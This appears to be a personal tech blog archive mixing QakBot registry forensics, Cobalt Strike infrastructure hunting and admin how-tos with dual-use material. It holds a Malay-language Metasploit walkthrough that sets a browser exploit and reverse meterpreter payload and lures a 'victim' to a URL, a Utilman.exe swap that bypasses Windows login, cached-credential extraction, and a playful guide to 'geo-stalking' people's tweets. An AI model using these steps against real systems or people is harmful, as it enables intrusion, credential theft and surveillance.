Tag Archives: windows

Decrypting QBot/QakBot Registry

Leave a reply

Recently, we have host machine that been infected with QBot/QakBot. Upon investigation, we found that it added a registry with some random name.

Based on Googling, I found this article – Decrypting Qakbot’s Encrypted Registry Keys which explain in details the encryption routine and how to decode the encrypted registry.

But I wondered.. How to decode the registry when we have only the artifacts e.g. NTUSER.dat, SOFTWARE registry hive collected.

Key Generation

Initially, system information is gathered by Qakbot from the infected host, including:
1. Computer Name (using GetComputerNameW)
2. Volume Serial Number (using GetVolumeInformationW)
3. User Account Name (using LookUpAccountSidW)

Let’s take, for example, our infected machine’s information:
Computer name: DESKTOP-4NQG47A (converted to UPPERCASE)
Volume Serial: 2797280851 (converted from the hexadecimal serial number A6BB1E53)
User Account Name: SECRET ACCOUNT (converted to UPPERCASE)

This information is then concatenated to form a password:
DESKTOP-4NQG47A2797280851SECRET ACCOUNT

The password is then hashed using a modified CRC32_shift4 algorithm.

Getting Ready

Typically, during case investigation, we usually have Computer Name and User Account Name info. But we missing the Volume Serial Number. To get that, run Powershell cmd below to get that serial number on infected host:

PS C:\ > Get-WmiObject Win32_volume | Format-table Name, @{Label = "SerialNumber"; Expression = {"{0:X}" -f $_.SerialNumber}}  -auto
Name                                        SerialNumber
----                                        ------------
C:\                                          CE6EB0A8

Next, convert the serial number from hex to decimal at https://www.rapidtables.com/convert/number/hex-to-decimal.html

CE6EB0A8 –> 3463360680

Now, we have the details of infected host:

W7VM39DKGH
3463360680 (from hex CE6EB0A8)
MAX_MAXIMUS

Next, we going to use this script below to decrypt the registry:
https://github.com/drole/qakbot-registry-decrypt

* Please note that this script needs to be run using Python 3+ and on Windows OS as it uses winreg library.
* Please setup this on your VM as we require to load/add the encrypted registry file to local machine.

Download the script and ensure required library and modules are installed in your VM.

Next, export the encrypted registry. In this example, I’m extracting the encrypted registry from NTUSER.dat:

To export it, open the NTUSER.dat file using Registry Explorer. Then, go to the encrypted registry path; in this case, its on SOFTWARE\Microsoft\Cjxgyfyefv. Then, right click on the key Cjxgyfyefv, select Export –> Key –> To .reg format. Choose your file name and location to save.

Copy the exported reg file to your VM. After that, double click the saved/exported .reg file to load/add it on your VM:

Click Yes to load/add the registry.

Check whether the registry is loaded or not via regedit:

Next, we going to decrypt the registry.

Before running the script, we need to do some modification. Comment the line 52 until 63:

Then, add the following: computer_name, volume_serial_number with the converted hexa number and user_account_name of the infected machine. Refer screenshot above.

After that, run the Python script to decrypt the registry:

python qakbot-registry-decrypt.py -r HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cjxgyfyefv

Remember to include also path to the encrypted registry key; in this case its HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cjxgyfyefv

As you can see, we able to decode the registry and read the content. We see the possible C2 IP; 85.86.242.245, the .dll name, location and the time of execution.

Check in VT for the C2 IP – https://www.virustotal.com/gui/ip-address/85.86.242.245/detection

Seems like the IP is also noted as QBot/QakBot related IP from various sources.

That’s all from me. Hope you enjoy reading the article. 🙂

Windows Credentials Manager – Looking for cached Zip Passwords

Leave a reply

Intro

When you open a password protected zip archive using Windows Explorer (“Extract All…”); in Windows 8.x/10, the password is automatically cached in the Credentials Manager for the life of the logon session.

Let’s say you discover a host been infected with a malware that coming from a zip file that are password-protected. We can possibly try to extract cached/stored credential from Windows Credential Manager and see if it stores password for password-protected file that we’re looking for.

Steps

To view if the host contains password for file that we needed, run this cmd below (require Admin privileges):

cmdkey /list

It will show list of stored credential that are available. If your target file is not listed, probably the credential has gone (the host has been rebooted) or the file been extracted using 3rd party apps (WinRAR, 7Zip).

To recover the password, we’ll need to use this Powershell script – https://github.com/zetlen/clortho/blob/master/CredMan.ps1

Download & save the script into target machine. Then, run the script as below:

.\CredMan.ps1 -GetCred -Target "target_credential"

e.g.:

.\CredMan.ps1 -GetCred -Target 'Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\Administrator\Downloads\GeoIP.zip'

As you can see, we able to retrieve the “GeoIP.zip” password (pass: testtest).

Hunting for possible attacker Cobalt-Strike infra

Leave a reply

Recently, we have an incident where suspicious traffic was observed related to external C2. Initial finding found that this IP 172.241.27.17 (172.241.24.0/21) resolved to
atakai[-]technologies[.]host; according to pDNS in Virustotal [1].

So, further digging on this IP found it has port 50050 open. Based on Recorded Future threat analysis report & Cobalt Strike Team Server Population Study, it mentioned that default port for Cobalt Strike controller is on port 50050.

So, I asked to myself. What if the neighboring IPs were also been setup for Cobalt Strike infrastructure? So I decided to go on this journey…

First, we know that the IP range is 172.241.24.0/21. By using this tool, we can convert CIDR notation to a range of IP addresses.

The result, we have 2048 addresses; IP address range between 172.241.24.0-172.241.31.255.

Next, we using online tool named Reverse IP & DNS API from WhoisXML API. Function of this tools is to reveals all domains that share an IP address. Example as below:

To use this tools, we need to buy credit to leverage its API. As for free account, you only have 100 credit to be use on Domain Research Suite tools. But on this case, we need around 2050 credit. Based on their website, 1000 DRS credits = $19.00. So.. yeah..

After you have enough credit, you can use the script as below:

#!/bin/bash

url="https://reverse-ip.whoisxmlapi.com/api/v1?apiKey=whoisxml_apikey&ip="

for i in $(cat ip.txt); do
	content="$(curl -s "$url$i")"
	echo "$content" >> output.txt
done

Remember to put your API key into the script. It will basically produce result into “output.txt“.

After that, import you result into Excel. Then, we sort and select possible domains from the output based on domain naming convention; e.g. atakai, amatai, amamai:

Now we have possible suspected IPs & domains. To further digging, we’ll leverage Shodan.io to see what are the open port available for those IPs.

To use it, we’ll using script as below:

$ curl -s https://api.shodan.io/shodan/host/{172.241.27.17,172.241.27.44,172.241.27.62,172.241.27.65,172.241.27.66,172.241.27.68,172.241.27.72,172.241.27.225,172.241.29.155,172.241.29.156,172.241.29.157}?key=shodan_apikey | jq -r '. | "IP: \(.ip_str) Ports: \(.ports)"'

The output should be like this:

Now we know 7/11 (no pun intended) IPs been observed by Shodan having port 50050 opened. This indicate that this set of IPs possibly used part of Cobalt Strike infra.

Next step is we can search for date registration for each domain from Whois data. But I’m too lazy to continue this. Also I’ve encountered where several Whois provider giving different info regarding of domain registration date. So yeah, maybe I’ll update next time when I’m free 😉

Import & export installed Cygwin packages

1 Reply

Recently I’ve changed my workstation to new one. Previously I’ve installed bunch of Cygwin packages on my old workstation.

So I thought; can I somehow migrate my installed Cygwin packages from my old workstation to new workstation?

The answer is yes. Follow me along to this wonderful journey XD

First you’ll need to save list of what you have installed on your Cygwin on old workstation.

To do this, open the Cygwin terminal/console & run this command below:

grep " 1$" /etc/setup/installed.db | awk '{printf "%s%s",sep,$1; sep=","} END{print ""}' > cygwin_packages.txt

Its basically dump list of installed Cygwin packages in your workstation & save it to text file named “cygwin_packages.txt” with comma-separated.

Next, go to your Cygwin home folder (commonly locate at “C:\cygwin64\home\”), open the “cygwin_packages.txt” file that we save before & copy all the content inside the text file (CTRL-C).

Next, at your new workstation, ensure you have downloaded the latest Cygwin installer “setup-x86.exe” (32-bit) or “setup-x86_64.exe” (64-bit).

Then, open your Windows cmd & change you directory to where you save the Cygwin installer; for my case here, I save it in my Downloads folder “C:\Users\Zam\Downloads”.

Then, run this command below on your Windows cmd; replacing/inserting the content of cygwin_packages.txt inside the double-quote as below:

setup-x86.exe -q -P "<paste the cygwin_packages.txt content here>"

You should see the Cygwin GUI opened & UAC requesting permission pop-up:

Click “Yes”, go through “Next” button & wait until the installation finished.

Upgrade Python packages at using pip

Leave a reply

As you read in the title above; to update your Python packages via pip.

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run as sudo. Probably.

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit:

http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Installing Owncloud on Nginx (Ubuntu 12.04)

Leave a reply

Here I want to share with you on how to create your own sync server like dropbox.
The software that we will use is ownCloud.

But before we start, please ensure that you already have the up & running nginx.
For tutorial, please refer here.

1. Make sure your OS is updated

apt-get update
apt-get upgrade

2. Install required package

apt-get install php5-cgi autoconf automake autotools-dev curl libapr1 libtool curl libcurl4-openssl-dev php-pear php-xml-parser php5 php5-cli php5-common php5-curl php5-dev php5-gd php5-sqlite php5-fpm

3. Edit nginx site config file file

vi /etc/nginx/sites-available/default

4. Edit like this;
Copy line below;

server {
        listen   80;
        root /usr/share/nginx/www;
        index index.php index.html index.htm;
        server_name _;

        location / {
                try_files $uri $uri/ @webdav;
        }

        location ~ ^/(data|config|.ht|db_structure.xml|README) {
                deny all;
        }

        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
                root /usr/share/nginx/www;
        }

        location ~ .*.(php|php5)?$ {
                try_files $uri =404;
                fastcgi_split_path_info ^(.+.php)(/.+)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                fastcgi_index index.php;
                include fastcgi_params;
        }

        location ~ ^/owncloud/remote.php(/.*)$ {
                fastcgi_split_path_info ^(.+.php)(/.*)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                include fastcgi_params;
        }

        location @webdav {
                fastcgi_split_path_info ^(.+.php)(/.*)$;
                fastcgi_pass unix:/tmp/php5-cgi.sock;
                include fastcgi_params;
        }

        location ~ /.ht {
                deny all;
        }
}

The “root /usr/share/nginx/www” line defines the root directory for nginx.
You can change it to other path you like.

5. Edit /etc/php5/conf.d/xcache.ini
Edit this two line;

xcache.size = 64M
xcache.var_size = 64M

6. Edit /etc/php5/fpm/php.ini
Edit this two line;

post_max_size = 2G
max_upload_size = 2G

7. Reload php5-fpm

/etc/init.d/php5-fpm reload

8. Get latest owncloud file (Latest 4.5 (4.5.5))

wget http://mirrors.owncloud.org/releases/owncloud-4.5.5.tar.bz2

9. Extract it at /usr/share/nginx/www

tar xvf owncloud-4.5.5.tar.bz2

So the path will be /usr/share/nginx/www/owncloud after extracted & the URL will be http://localhost/owncloud

10. Set the directory permissions;

chown -R www-data:www-data /usr/share/nginx/www

Replace ‘/usr/share/nginx/www‘ with your own path you prefered. (The path must be the same with the one in /etc/nginx/sites-available/default)

11. Go to http://localhost/owncloud or http:///owncloud
Create new admin account. Also please unsure that the path on data folder is correct.

12. Create new folder name “clientsync“, something like this;

 
13. Get Desktop Sync Clients at here http://owncloud.org/sync-clients/
Install it. Put your credential accordingly.

14. If everything fines, then your owncloud has been configured properly. Congratz!

Done. Hope it helps. 🙂

Reset Windows Server 2008 R2 password

Leave a reply

Reset the administrator/user password on Windows Server 2008 by using Windows Installation Disk

  1. Insert the Windows Server 2008 installation DVD
  2. Restart the computer, select boot from DVD
  3. Choose option “Repair your computer
  4. Select start command prompt
  5. Type in “C:
  6. Then, “CD C:WindowsSystem32
  7. MOVE Utilman.exe Utilman.exe.bak
  8. COPY Cmd.exe Utilman.exe
  9. You may also need to enable the administrator account which can be done by using “NET USER administrator /active:yes
  10. Restart the windows
  11. Then, at the login screen, type Windows-U, this fires up cmd.exe
  12. NET USER  e.g. NET USER administrator Presto!
  13. Now restart the computer again and move the original Utilman.exe back. e.g. MOVE Utilman.exe.bak Utilman.exe

Geo-stalking with Bing Maps and the Twitter Maps App

Leave a reply

Geo/Social stalking is fun. Bing Maps has the ability to add various “apps” to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let’s start with somewhere fun, like at German-Malaysian Institute (GMi), Bangi and see who’s tweeting around there.. ;D

First, open www.bing.com/maps/

Then, you can change the view to Aerial View for more nicer look. ;D
You may change to other place you want to view e.g. your home, college, workplace

Then, select Map apps options..

Then, select Twitter Maps apps..

Wait for a while for the page to reload the necessary thing (loading tweet around the map you currently viewing) 

 Aaannndd.. Ta-Da! Happy Stalking. ;D

Thanks to carnal0wnage for this tips. 😉

Metasploit?

12 Replies

Korang pernah tak teringin nak guna metasploit?
Korang penah tak dapat buat satu session menggunakan metasploit?
Aku tak pernah dapat gune metasploit ni.. 🙁

Tapi aku tak pernah mengalah(kecuali perkara2 tertentu)..
Akhirnya aku dapat jugak guna..
Dan dapat jugak access ke PC tu.. 🙂

So, meh aku kongsikan macam mana aku dapat buat benda ni..
Pertama, korang install dulu Metasploit.
Tak kesahlah versi apa2 pun.
Nanti boleh update.

Lepas dah install, jangan lupa untuk update.
Supaya korang dapat menggunakan lebih banyak sumber exploit kelak.

Lepas dan install & update,
korang run kan Metasploit.
Run yang console punya tau.
Sebab orang selalu cakap,
yang pakai CLI ni lagi efektif.
So, korang patut cuba.. 😉

Lepas dah run,
korang taipkan macam ni..

use windows/browser/ms06_001_wmf_setabortproc

Itu adalah exploit yang kita akan gunakan..
Exploit ni dia menggunakan browser(IE) untuk menjalankan kerja2 nya..

Lepas dah setkan exploit korang,
setkan pulak payload korang..

set payload windows/meterpreter/reverse_tcp

Lepas dah setkan payload tu,
korang assignkan/isikan apa2 yang patut macam LHOST, LPORT, SRVHOST, URL & lain2 yang berkenaan..

set SRVHOST 192.168.56.101
set LHOST 192.168.56.101

Lepas dah setkan suma,
taipkan show options untuk tengok balik semua setting2 korang tu..
Ngam ke tak. Apa yang dia require tu korang isikan la kalo tak isi lagi..

Lepas dah setel semua,
korang taipkan exploit..
Dia akan keluar lebih kurang macam ni..

[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[-] Handler failed to bind to 192.168.56.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z
[*] Server started.
[*] Sending exploit to 192.168.56.102:1274...
[*] Sending stage (748032 bytes) to 192.168.56.102

So, korang kenalah buatkan mangsa korang tu pergi ke URL http://192.168.56.101:8080/asjKYXWBb3z tu..
Barulah menjadi..
Kalo tak memang sampai bila2 lah tak jalan exploit & payload tu.. :p

Lepas korang dah bagi mangsa korang bukak URL tu,
korang akan dapat tengok kat msfconsole korang tu flow yang exploit sedang dijalankan ke mangsa yang bukak URL tu..

Kalo exploit korang menjadi,
dia akan keluar lebih kurang macam ni..

[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800

Haa.. Dah kena! Korang dah ada 1 session ngan dia..
Bole la korang upload/download dan macam2 lagi kat PC dia..
Meh kita tengok..

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

Id  Type         Information                         Connection
--  ----         -----------                         ----------
1   meterpreter  4NGRY-LE0P4RDzer0 @ 4NGRY-LE0P4RD  192.168.56.101:4444 -> 192.168.56.102:1275

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:Documents and Settingszer0Desktop
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:17 +0800  .
40777/rwxrwxrwx   0        dir   2010-06-05 15:09:29 +0800  ..
100777/rwxrwxrwx  690176   fil   2009-10-28 10:56:12 +0800  .NET Version Detector 2010.exe
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:19 +0800  Core_impact4
40777/rwxrwxrwx   0        dir   2010-06-05 16:37:23 +0800  Desktop
100666/rw-rw-rw-  1677     fil   2010-06-26 04:14:53 +0800  Process Hacker.lnk
100666/rw-rw-rw-  626      fil   2010-06-05 15:16:34 +0800  mirc.lnk
40777/rwxrwxrwx   0        dir   2010-06-05 14:54:58 +0800  nc111nt
100777/rwxrwxrwx  1261193  fil   2010-03-29 16:40:18 +0800  processhacker-1.11-setup.exe

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:af:62:54
IP Address  : 192.168.56.102
Netmask     : 255.255.255.0

Yeay! Saya dah berjaya. Haha..
Benda simple je kot..
Saya rasa orang lain tak pandang pun kalo saya dapat buat macam ni.. 🙁

Anyway, selamat mencuba la ye.
Ada pape, bole tanya saya.. 🙂